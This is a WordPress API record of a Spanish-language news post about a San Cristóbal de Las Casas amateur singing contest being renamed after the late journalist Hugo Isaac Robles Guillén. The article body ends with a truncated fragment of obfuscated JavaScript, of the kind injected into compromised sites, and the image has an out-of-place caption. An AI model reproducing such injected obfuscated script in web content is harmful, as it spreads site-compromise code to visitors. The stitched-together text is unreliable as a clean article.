{"id":1308,"date":"2022-04-13T03:44:07","date_gmt":"2022-04-13T03:44:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1308"},"modified":"2022-04-13T03:44:08","modified_gmt":"2022-04-13T03:44:08","slug":"concurso-de-aficionados-al-canto-llevara-el-nombre-hugo-isaac-robles-guillen","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1308","title":{"rendered":"Concurso de \u201cAficionados al Canto\u201d llevar\u00e1 el nombre Hugo Isaac Robles Guill\u00e9n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-12-at-4.55.45-PM.jpeg\" alt=\"\" class=\"wp-image-1309\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-12-at-4.55.45-PM.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-12-at-4.55.45-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-12-at-4.55.45-PM-768x576.jpeg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>I&#8217;ll<\/figcaption><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- La Delegaci\u00f3n San Crist\u00f3bal de la Asociaci\u00f3n Nacional de Locutores de M\u00e9xico A. C. dio a conocer los detalles de la edici\u00f3n 26\u00b0 del concurso de aficionados al Canto que se realiza en el marco de la Feria de la Primavera y de la Paz, que este a\u00f1o llevar\u00e1 el nombre de \u201cHugo Isaac Robles Guill\u00e9n\u201d, pionero en este sentido.<\/p>\n\n\n\n<p>En conferencia de prensa, la mesa directiva de esta asociaci\u00f3n en San Crist\u00f3bal, explic\u00f3 que el cambio de nombre se debe a que el periodista fallecido, Hugo Isaac Robles Guill\u00e9n fue uno de los fundadores y promotores de esta competencia, y tambi\u00e9n por la trayectoria exitosa que tuvo en el periodismo \u201ceste cambio de nombre se efectuar\u00e1 a partir de esta edici\u00f3n\u201d.<\/p>\n\n\n\n<p>Detallaron que el 13 de abril realizar\u00e1 el casting en el teatro \u201cZebad\u00faa\u201d ubicado en el centro de la ciudad de 09:00 a 16:00 horas, y que las fases eliminatorias se ejecutar\u00e1n el lunes 18, mi\u00e9rcoles 20 y viernes 22 respectivamente a partir de las 16:00 horas.<\/p>\n\n\n\n<p>Abundaron que el concurso estar\u00e1 dividido en dos categor\u00edas, la infantil que es hasta los 14 a\u00f1os y la adulta que es de 15 a\u00f1os en adelante y en ambas competencias obtendr\u00e1n un premio a los primeros tres lugares.<\/p>\n\n\n\n<p>La directiva culmin\u00f3 agradeciendo a los medios de comunicaci\u00f3n por difundir el concurso al p\u00fablico porque debido a ellos estos eventos han obtenido un prestigio importante.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>I&#8217;ll \u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- La Delegaci\u00f3n San Crist\u00f3bal de la Asociaci\u00f3n Nacional de Locutores de M\u00e9xico A. C. dio a conocer los detalles de la edici\u00f3n 26\u00b0 del concurso de aficionados al Canto que se realiza en el marco de la Feria de la Primavera y de la Paz, que este &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1309,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1308","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1308","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1308"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1308\/revisions"}],"predecessor-version":[{"id":1310,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1308\/revisions\/1310"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1309"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1308"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}